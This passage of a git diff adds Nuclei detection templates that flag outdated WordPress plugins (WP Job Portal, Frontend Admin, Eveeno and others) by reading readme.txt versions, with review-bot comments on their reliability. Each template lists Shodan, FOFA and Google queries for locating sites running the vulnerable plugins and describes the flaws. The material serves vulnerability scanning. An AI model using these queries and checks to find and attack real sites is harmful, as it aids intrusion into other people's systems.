+ + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-11713-3ce068c28a3bf30675cdafd7af7432b5.yaml b/poc/cve/CVE-2024-11713-3ce068c28a3bf30675cdafd7af7432b5.yaml new file mode 100644 index 0000000000..88f190a58d --- /dev/null +++ b/poc/cve/CVE-2024-11713-3ce068c28a3bf30675cdafd7af7432b5.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11713-3ce068c28a3bf30675cdafd7af7432b5 + +info: + name: > + WP Job Portal <= 2.2.2 - Authenticated (Admin+) SQL Injection via wpjobportal_deactivate() + author: topscoder + severity: low + description: > + The WP Job Portal – A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'page_id' parameter of the wpjobportal_deactivate() function in all versions up to, and including, 2.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4d67675a-b77b-41c6-a94f-d9385e609b37?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-11713 + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:CVE-2024-11713' + tags: cve,wordpress,wp-plugin,wp-job-portal,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-11714-6e3bac814e83994dd0e0e3a82cd823a9.yaml b/poc/cve/CVE-2024-11714-6e3bac814e83994dd0e0e3a82cd823a9.yaml new file mode 100644 index 0000000000..51e62ccca7 --- /dev/null +++ b/poc/cve/CVE-2024-11714-6e3bac814e83994dd0e0e3a82cd823a9.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11714-6e3bac814e83994dd0e0e3a82cd823a9 + +info: + name: > + WP Job Portal <= 2.2.2 - Authenticated (Admin+) SQL Injection via getFieldsForVisibleCombobox() + author: topscoder + severity: low + description: > + The WP Job Portal – A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to SQL Injection via the 'ff' parameter of the getFieldsForVisibleCombobox() function in all versions up to, and including, 2.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/505858dc-c420-484c-a067-6962836eea6a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2024-11714 + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:CVE-2024-11714' + tags: cve,wordpress,wp-plugin,wp-job-portal,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.2') \ No newline at end of file 
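Review bot: The two `extractors` entries are identical apart from `internal: true`, and nothing in the template says why both are present. As far as I can tell the internal one supplies `version` to the `compare_versions(version, '<= 2.2.2')` matcher and the second only prints the extracted value in the result, so a comment would stop someone deleting one as a duplicate: `# internal: feeds the dsl matcher; the non-internal copy below reports the version in output`. The same pair is repeated in every template in this commit.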
diff --git a/poc/cve/CVE-2024-11715-f8ac92a9956b6a02eeac6f3837fff40b.yaml b/poc/cve/CVE-2024-11715-f8ac92a9956b6a02eeac6f3837fff40b.yaml new file mode 100644 index 0000000000..6a0d70eec6 --- /dev/null +++ b/poc/cve/CVE-2024-11715-f8ac92a9956b6a02eeac6f3837fff40b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11715-f8ac92a9956b6a02eeac6f3837fff40b + +info: + name: > + WP Job Portal <= 2.2.2 - Missing Authorization to Limited Privilege Escalation + author: topscoder + severity: high + description: > + The WP Job Portal – A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the assignUserRole() function in all versions up to, and including, 2.2.2. This makes it possible for unauthenticated attackers to elevate their privileges to that of an employer. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4107199d-e3c7-4379-b39d-1868de7d777b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2024-11715 + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:CVE-2024-11715' + tags: cve,wordpress,wp-plugin,wp-job-portal,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.2') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-11720-d0f4b1ce743d359b9844d3054e4a5af9.yaml b/poc/cve/CVE-2024-11720-d0f4b1ce743d359b9844d3054e4a5af9.yaml
new file mode 100644
index 0000000000..61a057d2b2
--- /dev/null
+++ b/poc/cve/CVE-2024-11720-d0f4b1ce743d359b9844d3054e4a5af9.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-11720-d0f4b1ce743d359b9844d3054e4a5af9 + +info: + name: > + Frontend Admin by DynamiApps <= 3.24.5 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via submission forms in all versions up to, and including, 3.24.5 due to insufficient input sanitization and output escaping on the new Taxonomy form. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is only exploitable when lower-level users have been granted access to submit specific forms, which is disabled by default. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/69a464f4-c357-446f-a5b8-0919d9af56c9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-11720 + metadata: + fofa-query: "wp-content/plugins/acf-frontend-form-element/" + google-query: inurl:"/wp-content/plugins/acf-frontend-form-element/" + shodan-query: 'vuln:CVE-2024-11720' + tags: cve,wordpress,wp-plugin,acf-frontend-form-element,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/acf-frontend-form-element/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "acf-frontend-form-element" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.24.5') \ No newline at end of file 
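Review bot: A match here only shows that `readme.txt` advertises a `Stable tag` of 3.24.5 or lower; the template never checks the condition its own description gives, that the flaw "is only exploitable when lower-level users have been granted access to submit specific forms, which is disabled by default". Reported at `severity: high`, the result will read as a confirmed unauthenticated stored XSS on sites where those forms are not exposed at all. I would say so in the `name`, for example by appending `(version check only)`, so triage treats it as a patch-level finding to verify against the site's form settings. CVE-2024-11721 in the next hunk has the same dependency on form access.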
diff --git a/poc/cve/CVE-2024-11721-dc2aa37d169a99daa955380439331a02.yaml b/poc/cve/CVE-2024-11721-dc2aa37d169a99daa955380439331a02.yaml
new file mode 100644
index 0000000000..7e8658fc18
--- /dev/null
+++ b/poc/cve/CVE-2024-11721-dc2aa37d169a99daa955380439331a02.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-11721-dc2aa37d169a99daa955380439331a02 + +info: + name: > + Frontend Admin by DynamiApps <= 3.24.5 - Unauthenticated Privilege Escalation + author: topscoder + severity: high + description: > + The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.24.5. This is due to insufficient controls on the user role select field when utilizing the 'Role' field in a form. This makes it possible for unauthenticated attackers to create new administrative user accounts, even when the administrative user role has not been provided as an option to the user, granted that unauthenticated users have been provided access to the form. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e9fdc833-8384-42c0-ad9b-72e5b6351964?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-11721 + metadata: + fofa-query: "wp-content/plugins/acf-frontend-form-element/" + google-query: inurl:"/wp-content/plugins/acf-frontend-form-element/" + shodan-query: 'vuln:CVE-2024-11721' + tags: cve,wordpress,wp-plugin,acf-frontend-form-element,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/acf-frontend-form-element/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "acf-frontend-form-element" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.24.5') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-11751-fd6fb920fe0d64ca3888bb1674349134.yaml b/poc/cve/CVE-2024-11751-fd6fb920fe0d64ca3888bb1674349134.yaml
new file mode 100644
index 0000000000..0d864767c6
--- /dev/null
+++ b/poc/cve/CVE-2024-11751-fd6fb920fe0d64ca3888bb1674349134.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-11751-fd6fb920fe0d64ca3888bb1674349134 + +info: + name: > + TCBD Popover <= 1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The TCBD Popover plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tcbd-popover-image ' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3b08f533-9c74-4be3-99ff-70a3d9b90358?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11751 + metadata: + fofa-query: "wp-content/plugins/tcbd-popover/" + google-query: inurl:"/wp-content/plugins/tcbd-popover/" + shodan-query: 'vuln:CVE-2024-11751' + tags: cve,wordpress,wp-plugin,tcbd-popover,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tcbd-popover/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tcbd-popover" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11752-932bb2de288ef26bc4c101684c7cb531.yaml b/poc/cve/CVE-2024-11752-932bb2de288ef26bc4c101684c7cb531.yaml new file mode 100644 index 0000000000..f9fc94d548 --- /dev/null 
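Review bot: The pattern `(?mi)Stable tag: ([0-9.]+)` requires exactly one space after the colon and a numeric value, so a readme that uses a tab or extra spaces, or declares `Stable tag: trunk`, yields no `version`; the `compare_versions(version, '<= 1.2')` matcher then fails quietly and a vulnerable install goes unreported. Loosening both extractor patterns to `(?mi)Stable tag:[ \t]*([0-9.]+)` covers the spacing case, while the `trunk` case would need another version source. The readme can also lag behind the installed code, so a hit is best treated as an indicator to confirm. Every template in this commit uses the same pattern.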
+++ b/poc/cve/CVE-2024-11752-932bb2de288ef26bc4c101684c7cb531.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11752-932bb2de288ef26bc4c101684c7cb531 + +info: + name: > + Eveeno <= 1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Eveeno plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'eveeno' shortcode in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e254f0ba-9008-44e9-bf8f-31c9614d6f64?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11752 + metadata: + fofa-query: "wp-content/plugins/eveeno/" + google-query: inurl:"/wp-content/plugins/eveeno/" + shodan-query: 'vuln:CVE-2024-11752' + tags: cve,wordpress,wp-plugin,eveeno,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/eveeno/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "eveeno" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11754.yaml b/poc/cve/CVE-2024-11754.yaml new file mode 100644 index 0000000000..94b30021d3 --- /dev/null +++ b/poc/cve/CVE-2024-11754.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11754-f1c9edc69abf1d1c2adb003324039811 + +info: + name: > + Booking System Trafft <= 1.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Booking System Trafft plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'trafftbooking' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/84adbde0-9a9b-4a76-9333-56880fcc139d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11754 + metadata: + fofa-query: "wp-content/plugins/booking-system-trafft/" + google-query: inurl:"/wp-content/plugins/booking-system-trafft/" + shodan-query: 'vuln:CVE-2024-11754' + tags: cve,wordpress,wp-plugin,booking-system-trafft,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking-system-trafft/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking-system-trafft" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.6') \ No newline at end of file 
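Review bot: This file is added as `poc/cve/CVE-2024-11754.yaml` while its `id` is `CVE-2024-11754-f1c9edc69abf1d1c2adb003324039811`, whereas most files in this commit carry the hash suffix in the file name too. With two naming schemes in one directory the same template can end up committed under both names and run twice per target; whether that has happened cannot be seen from this hunk. I would name the file after its `id`, and apply the same rule to CVE-2024-11767, -11809, -11827, -11832 and -11841, which are added with the short name as well.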
diff --git a/poc/cve/CVE-2024-11755-935ec9fc2ee3b23b1ccc21acca8e8636.yaml b/poc/cve/CVE-2024-11755-935ec9fc2ee3b23b1ccc21acca8e8636.yaml
new file mode 100644
index 0000000000..f3a9c1615b
--- /dev/null
+++ b/poc/cve/CVE-2024-11755-935ec9fc2ee3b23b1ccc21acca8e8636.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-11755-935ec9fc2ee3b23b1ccc21acca8e8636 + +info: + name: > + IMS Countdown <= 1.3.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The IMS Countdown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown post settings in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2de22728-4f67-406c-9db5-33cbba4c15eb?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11755 + metadata: + fofa-query: "wp-content/plugins/ims-countdown/" + google-query: inurl:"/wp-content/plugins/ims-countdown/" + shodan-query: 'vuln:CVE-2024-11755' + tags: cve,wordpress,wp-plugin,ims-countdown,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ims-countdown/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ims-countdown" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11759-d6a0a8830fda868046b3c5319b1e8383.yaml b/poc/cve/CVE-2024-11759-d6a0a8830fda868046b3c5319b1e8383.yaml new file mode 100644 index 0000000000..f7efdc86aa --- /dev/null 
+++ b/poc/cve/CVE-2024-11759-d6a0a8830fda868046b3c5319b1e8383.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11759-d6a0a8830fda868046b3c5319b1e8383 + +info: + name: > + Bukza <= 2.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Bukza plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bukza' shortcode in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3e348b24-4c49-43ed-b4f3-b31f0f709830?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11759 + metadata: + fofa-query: "wp-content/plugins/bukza/" + google-query: inurl:"/wp-content/plugins/bukza/" + shodan-query: 'vuln:CVE-2024-11759' + tags: cve,wordpress,wp-plugin,bukza,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bukza/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bukza" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11763-abc5d805ccc6f324bc8947787eeff644.yaml b/poc/cve/CVE-2024-11763-abc5d805ccc6f324bc8947787eeff644.yaml new file mode 100644 index 0000000000..3e51daba8f --- /dev/null 
+++ b/poc/cve/CVE-2024-11763-abc5d805ccc6f324bc8947787eeff644.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11763-abc5d805ccc6f324bc8947787eeff644 + +info: + name: > + Plezi <= 1.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Plezi plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'plezi' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/67768957-45be-48d9-ad5e-147290ef4cd5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11763 + metadata: + fofa-query: "wp-content/plugins/plezi/" + google-query: inurl:"/wp-content/plugins/plezi/" + shodan-query: 'vuln:CVE-2024-11763' + tags: cve,wordpress,wp-plugin,plezi,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/plezi/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "plezi" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11767.yaml b/poc/cve/CVE-2024-11767.yaml new file mode 100644 index 0000000000..9df61cfc67 --- /dev/null +++ b/poc/cve/CVE-2024-11767.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11767-91a6d26ebb5178e02ef1e638799045fa + +info: + name: > + NewsmanApp <= 2.7.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The NewsmanApp plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'newsman_subscribe_widget' shortcode in all versions up to, and including, 2.7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/22a02e75-4ab1-48fb-b618-b1dff2fcd97f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11767 + metadata: + fofa-query: "wp-content/plugins/newsmanapp/" + google-query: inurl:"/wp-content/plugins/newsmanapp/" + shodan-query: 'vuln:CVE-2024-11767' + tags: cve,wordpress,wp-plugin,newsmanapp,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/newsmanapp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "newsmanapp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11770-8a21d7ed25582479ddfaa17a6cbfc663.yaml b/poc/cve/CVE-2024-11770-8a21d7ed25582479ddfaa17a6cbfc663.yaml new file mode 100644 index 0000000000..e08a410296 --- /dev/null 
+++ b/poc/cve/CVE-2024-11770-8a21d7ed25582479ddfaa17a6cbfc663.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11770-8a21d7ed25582479ddfaa17a6cbfc663 + +info: + name: > + Post Carousel & Slider <= 1.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Post Carousel & Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'post-cs' shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4cc038af-c4c8-4141-bbe3-81bcf0a2bace?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-11770 + metadata: + fofa-query: "wp-content/plugins/post-types-carousel-slider/" + google-query: inurl:"/wp-content/plugins/post-types-carousel-slider/" + shodan-query: 'vuln:CVE-2024-11770' + tags: cve,wordpress,wp-plugin,post-types-carousel-slider,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-types-carousel-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-types-carousel-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.4') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-11809.yaml b/poc/cve/CVE-2024-11809.yaml new file mode 100644 index 0000000000..40bd90c946 --- /dev/null +++ b/poc/cve/CVE-2024-11809.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11809-f088a4ea2afc64dbeeb9c239f0dd835c + +info: + name: > + Primer MyData for Woocommerce <= 4.2.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Primer MyData for Woocommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'img_src' parameter in all versions up to, and including, 4.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/aca092cf-9482-468e-8dd4-af04e25bcf33?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11809 + metadata: + fofa-query: "wp-content/plugins/primer-mydata/" + google-query: inurl:"/wp-content/plugins/primer-mydata/" + shodan-query: 'vuln:CVE-2024-11809' + tags: cve,wordpress,wp-plugin,primer-mydata,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/primer-mydata/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "primer-mydata" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-11827.yaml b/poc/cve/CVE-2024-11827.yaml
new file mode 100644
index 0000000000..c37330b51e
--- /dev/null
+++ b/poc/cve/CVE-2024-11827.yaml
